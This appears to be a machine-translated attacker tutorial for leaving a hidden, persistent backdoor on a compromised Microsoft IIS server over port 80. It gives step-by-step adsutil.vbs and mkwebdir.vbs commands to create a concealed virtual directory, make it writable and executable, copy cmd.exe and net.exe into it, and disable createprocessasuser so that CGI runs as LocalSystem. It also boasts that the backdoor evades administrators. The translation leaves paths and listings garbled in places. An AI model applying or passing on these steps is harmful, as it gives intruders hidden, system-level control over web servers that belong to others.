Real IIS forever backdoor decryption

IIS is a popular WWW server, with many improper configuration vulnerabilities. Leave a backdoor after the IIS server is intruded and you can control it at any time. Generally, backdoor programs enable a special port for listening. For example, NC, NTLM, and RNC all use Telnet to monitor remote connection control on the server. However, a strictly protected WWW site (after their administrators suffer) usually limits the port through the firewall. In this way, other ports except the ports opened by the administrator cannot be connected. However, port 80 cannot be disabled (if the Administrator does not take the wrong medicine ). You can leave a backdoor on port 80 to enable the backdoor forever.

When IIS starts the CGI application, the createprocessasuser API is used by default to create a new process for the CGI. the security context of the program is determined by the user who starts the CGI. Generally, anonymous users are mapped to the iusr_computername account. Of course, the administrator can change it to another user. Or a legal user is provided by the browser. Both users have low permissions and may belong to members of the guest group. In fact, we can modify IIS to enable CGI to improve permissions. We can see that the main IIS process runs under the LocalSystem account, so we can get the highest LocalSystem permission.

After a web server is intruded, you can usually bind a cmd to a port to remotely control the server. In this case, you can have remote control over the GUI, such as 3389, or remote control like Telnet text, such as RNC. NC must be usable. In fact, this is enough.

1. telnet to the server

2. cscript.exe adsutil. vbs Enum w3svc/1/root

Keytype: (string) "iiswebvirtualdir"
Approot: (string) "/lm/w3svc/1/root"
Appfriendlyname: (string) "Default Application"
Appisolated: (integer) 2
Accessread: (Boolean) True
Accesswrite: (Boolean) False
Accessexecute: (Boolean) False
Accessscript: (Boolean) True
Accesssource: (Boolean) False
Accessnoremoteread: (Boolean) False
Accessnoremotewrite: (Boolean) False
Accessnoremoteexecute: (Boolean) False
Accessnoremotescript: (Boolean) False
Httperrors: (list) (32 items)
"400, *, file, C: winnthelpiishelpcommon400.htm"
"401,1, file, C: WINNThelpiisHelpcommon401-1.htm"
"401,2, file, C: WINNThelpiisHelpcommon401-2.htm"
"401,3, file, C: WINNThelpiisHelpcommon401-3.htm"
"40, file, C: WINNThelpiisHelpcommon401-4.htm"
", File, C: WINNThelpiisHelpcommon401-5.htm"
"403,1, file, C: WINNThelpiisHelpcommon403-1.htm"
"403,2, file, C: WINNThelpiisHelpcommon403-2.htm"
"403,3, file, C: WINNThelpiisHelpcommon403-3.htm"
"403,4, file, C: WINNThelpiisHelpcommon403-4.htm"
"403,5, file, C: WINNThelpiisHelpcommon403-5.htm"
"403,6, file, C: WINNThelpiisHelpcommon403-6.htm"
"403,7, file, C: WINNThelpiisHelpcommon403-7.htm"
"403,8, file, C: WINNThelpiisHelpcommon403-8.htm"
"403,9, file, C: WINNThelpiisHelpcommon403-9.htm"
"403,10, file, C: WINNThelpiisHelpcommon403-10.htm"
", File, C: WINNThelpiisHelpcommon403-11.htm"
"403,12, file, C: WINNThelpiisHelpcommon403-12.htm"

"403,13, file, C: WINNThelpiisHelpcommon403-13.htm"
", File, C: WINNThelpiisHelpcommon403-15.htm"
"403,16, file, C: WINNThelpiisHelpcommon403-16.htm"
"403,17, file, C: WINNThelpiisHelpcommon403-17.htm"
"404, *, file, C: winnthelpiishelpcommon404b.htm"
"405, *, file, C: winnthelpiishelpcommon405.htm"
"406, *, file, C: winnthelpiishelpcommon406.htm"
"407, *, file, C: winnthelpiishelpcommon407.htm"
"412, *, file, C: winnthelpiishelpcommon412.htm"
"414, *, file, C: winnthelpiishelpcommon414.htm"
", 12, file, C: WINNThelpiisHelpcommon500-12.htm"
", File, C: WINNThelpiisHelpcommon500-13.htm"
", 15, file, C: WINNThelpiisHelpcommon500-15.htm"
"500,100, URL,/IISHelp/common/500-100.asp"

Frontpageweb: (Boolean) True
Path: (string) "C: inetpubwwwroot"
Accessflags: (integer) 513
[/W3svc/1/root/localstart. asp]
[/W3svc/1/root/_ vti_pvt]
[/W3svc/1/root/_ vti_log]
[/W3svc/1/root/_ private]
[/W3svc/1/root/_ vti_txt]
[/W3svc/1/root/_ vti_script]
[/W3svc/1/root/_ vti_cnf]
[/W3svc/1/root/_ vti_bin]

Don't tell me what the above output is !!!!

Now we have a bottom in our hearts, right! The Administrator is unlucky.

3. mkdir C: inetpubwwwrootdir1
4. cscript.exe mkwebdir. vbs-C mycomputer-W "Default web site"-V "virtual dir1", "C: inetpubwwwrootdir1"

In this way, a virtual directory: Virtual dir1 is created.

You can run the 1 command to check

5. Next, we need to change the attribute of virtual dir1 to execute.

Cscript.exe adsutil. vbs set w3svc/1/root/virtual dir1/accesswrite "true"-S:
Cscript.exe adsutil. vbs set w3svc/1/root/virtual dir1/accessexecute "true"-S:

Now you can upload the content to this directory and run it. You can also copy cmd.exe net.exe directly to the disk directory of the virtual directory.

6. the following command forces IIS to create a new CGI process in its own security environment by modifying IIS metabase

Cscript adsutil. vbs set/w3svc/1/root/[your directory]/createprocessasuser false

Note: cscript Windows Script Host.

Adsutil. vbs Windows IIS administration script

IIS metabase path

Such a backdoor is almost impossible to find out, unless you view all the virtual directories. (If the Administrator has completed the suicide note, check it)